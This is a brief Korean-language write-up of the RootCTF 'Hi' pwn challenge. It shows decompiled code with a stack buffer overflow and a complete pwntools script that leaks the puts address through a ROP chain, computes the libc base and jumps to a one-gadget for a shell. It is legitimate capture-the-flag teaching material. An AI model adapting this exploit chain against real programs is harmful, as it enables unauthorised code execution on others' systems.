Rootctf Hi Writeup

LeeDoHyun · March 11, 2020

check 함수에서 오버플로우가 터지는것을 확인할 수 있습니다.

__int64 check()
{
  __int64 result; // rax
  char dest; // [rsp+0h] [rbp-100h]

  result = (unsigned int)final;
  if ( !final )
  {
    puts("you are the winner!!");
    puts("wirte your name...");
    read(0, wizard, 0x200uLL);                  // overflow
    memcpy(&dest, wizard, 0x200uLL);
    puts(&dest);
    result = 0LL;
  }
  return result;
}

특정 조건만큼 exp쌓은다음 puts릭하고 원샷을 됩니다.

ex.py

from pwn import *

context.log_level = "debug"
r = process("./Hi")
e = ELF("./Hi")
libc = e.libc

pop_rdi = 0x4012b3
ret = 0x400819
puts_plt = e.plt["puts"]
puts_got = e.got["puts"]
check = e.symbols["check"]

r.recvuntil("> ")
r.sendline("2")
r.recvuntil("Name : ")
r.sendline("A")
r.recvuntil("> ")
r.sendline("1")
r.recvuntil("> ")
r.sendline("1")
r.recvuntil("> ")
r.sendline("1")
r.recvuntil("> ")
r.sendline("1")
r.recvuntil("> ")
r.sendline("1")
r.recvuntil("> ")
r.sendline("1")
r.recvuntil("> ")
r.sendline("1")
r.recvuntil("> ")
r.sendline("1")
r.recvuntil("> ")
r.sendline("2")
r.recvuntil("wirte your name...")

payload = "A"*(0x100 + 0x8)
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(check)
r.sendline(payload)

puts_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
base = puts_leak - libc.symbols["puts"]
oneshot = base + 0x4526a

info("puts leak addr = " + hex(puts_leak))
info("base addr = " + hex(base))
info("oneshot = " + hex(oneshot))

payload = "A"*(0x100 + 0x8)
payload += p64(oneshot)
payload += p64(0) * 8
r.sendline(payload)
r.interactive()

Twitter, Facebook